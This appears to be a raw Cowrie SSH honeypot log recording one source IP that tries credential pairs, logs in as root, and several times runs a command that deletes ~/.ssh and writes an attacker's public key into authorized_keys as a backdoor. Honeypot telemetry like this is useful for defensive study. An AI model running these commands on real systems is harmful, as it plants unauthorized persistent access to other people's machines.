{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T18:22:40.989527Z","src_ip":"212.227.235.229","session":"c67579f0205d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T18:22:41.304017Z","src_ip":"212.227.235.229","session":"c67579f0205d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:22:41.304862Z","src_ip":"212.227.235.229","session":"c67579f0205d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52212,"dst_ip":"1.2.3.4","dst_port":22,"session":"317e99df61fa","protocol":"ssh","message":"New connection: 212.227.235.229:52212 (1.2.3.4:22) [session: 317e99df61fa]","sensor":"my-vps","timestamp":"2025-08-28T18:22:41.604464Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:22:41.605120Z","src_ip":"212.227.235.229","session":"317e99df61fa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:22:42.722275Z","src_ip":"212.227.235.229","session":"317e99df61fa"}
{"eventid":"cowrie.session.closed","duration":31.31198239326477,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:22:44.838483Z","src_ip":"212.227.235.229","session":"65abc61a41e5"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T18:22:44.916420Z","src_ip":"212.227.235.229","session":"317e99df61fa"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:22:46.219309Z","src_ip":"212.227.235.229","session":"317e99df61fa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53276,"dst_ip":"1.2.3.4","dst_port":22,"session":"c099f022642e","protocol":"ssh","message":"New connection: 212.227.235.229:53276 (1.2.3.4:22) [session: c099f022642e]","sensor":"my-vps","timestamp":"2025-08-28T18:22:46.521023Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:22:46.521983Z","src_ip":"212.227.235.229","session":"c099f022642e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:22:47.648150Z","src_ip":"212.227.235.229","session":"c099f022642e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:22:48.893888Z","src_ip":"212.227.235.229","session":"c099f022642e"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:22:49.198859Z","src_ip":"212.227.235.229","session":"c099f022642e"}
{"eventid":"cowrie.session.closed","duration":"13.3","message":"Connection lost after 13.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:22:49.203063Z","src_ip":"212.227.235.229","session":"c67579f0205d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52424,"dst_ip":"1.2.3.4","dst_port":22,"session":"665503dde5e6","protocol":"ssh","message":"New connection: 212.227.235.229:52424 (1.2.3.4:22) [session: 665503dde5e6]","sensor":"my-vps","timestamp":"2025-08-28T18:22:49.569181Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:22:49.570077Z","src_ip":"212.227.235.229","session":"665503dde5e6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:22:49.852831Z","src_ip":"212.227.235.229","session":"665503dde5e6"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin112","message":"login attempt [root/Admin112] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:22:51.026624Z","src_ip":"212.227.235.229","session":"665503dde5e6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:22:51.611110Z","src_ip":"212.227.235.229","session":"665503dde5e6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T18:22:51.611802Z","src_ip":"212.227.235.229","session":"665503dde5e6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T18:22:51.612853Z","src_ip":"212.227.235.229","session":"665503dde5e6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:22:51.896525Z","src_ip":"212.227.235.229","session":"665503dde5e6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:22:52.522599Z","src_ip":"212.227.235.229","session":"665503dde5e6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T18:22:52.523283Z","src_ip":"212.227.235.229","session":"665503dde5e6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T18:22:52.808257Z","src_ip":"212.227.235.229","session":"665503dde5e6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:22:52.809166Z","src_ip":"212.227.235.229","session":"665503dde5e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52436,"dst_ip":"1.2.3.4","dst_port":22,"session":"02a29ae996b6","protocol":"ssh","message":"New connection: 212.227.235.229:52436 (1.2.3.4:22) [session: 02a29ae996b6]","sensor":"my-vps","timestamp":"2025-08-28T18:22:53.092389Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:22:53.093260Z","src_ip":"212.227.235.229","session":"02a29ae996b6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:22:53.379042Z","src_ip":"212.227.235.229","session":"02a29ae996b6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T18:22:54.565170Z","src_ip":"212.227.235.229","session":"02a29ae996b6"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:22:55.853642Z","src_ip":"212.227.235.229","session":"02a29ae996b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55332,"dst_ip":"1.2.3.4","dst_port":22,"session":"d26b0b1e54b6","protocol":"ssh","message":"New connection: 212.227.235.229:55332 (1.2.3.4:22) [session: d26b0b1e54b6]","sensor":"my-vps","timestamp":"2025-08-28T18:22:56.156229Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:22:56.157022Z","src_ip":"212.227.235.229","session":"d26b0b1e54b6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:22:56.460037Z","src_ip":"212.227.235.229","session":"d26b0b1e54b6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:22:57.713334Z","src_ip":"212.227.235.229","session":"d26b0b1e54b6"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:22:58.017866Z","src_ip":"212.227.235.229","session":"665503dde5e6"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:22:58.018997Z","src_ip":"212.227.235.229","session":"d26b0b1e54b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33128,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf85e43c4c45","protocol":"ssh","message":"New connection: 212.227.235.229:33128 (1.2.3.4:22) [session: bf85e43c4c45]","sensor":"my-vps","timestamp":"2025-08-28T18:23:27.255096Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:23:27.256056Z","src_ip":"212.227.235.229","session":"bf85e43c4c45"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:23:27.484305Z","src_ip":"212.227.235.229","session":"bf85e43c4c45"}
{"eventid":"cowrie.login.success","username":"root","password":"q3xaDraz","message":"login attempt [root/q3xaDraz] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:23:28.437175Z","src_ip":"212.227.235.229","session":"bf85e43c4c45"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:23:29.310760Z","src_ip":"212.227.235.229","session":"bf85e43c4c45"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T18:23:29.311501Z","src_ip":"212.227.235.229","session":"bf85e43c4c45"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T18:23:29.312441Z","src_ip":"212.227.235.229","session":"bf85e43c4c45"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:23:29.543943Z","src_ip":"212.227.235.229","session":"bf85e43c4c45"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:23:30.022737Z","src_ip":"212.227.235.229","session":"bf85e43c4c45"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T18:23:30.023405Z","src_ip":"212.227.235.229","session":"bf85e43c4c45"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T18:23:30.253588Z","src_ip":"212.227.235.229","session":"bf85e43c4c45"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:23:30.254702Z","src_ip":"212.227.235.229","session":"bf85e43c4c45"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33854,"dst_ip":"1.2.3.4","dst_port":22,"session":"304306e3b247","protocol":"ssh","message":"New connection: 212.227.235.229:33854 (1.2.3.4:22) [session: 304306e3b247]","sensor":"my-vps","timestamp":"2025-08-28T18:23:30.490782Z"}
